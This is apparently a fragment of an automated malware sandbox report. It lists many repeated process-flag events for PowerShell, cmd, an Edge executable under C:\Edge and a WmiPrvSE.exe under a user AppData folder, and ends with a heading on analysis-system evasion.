                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
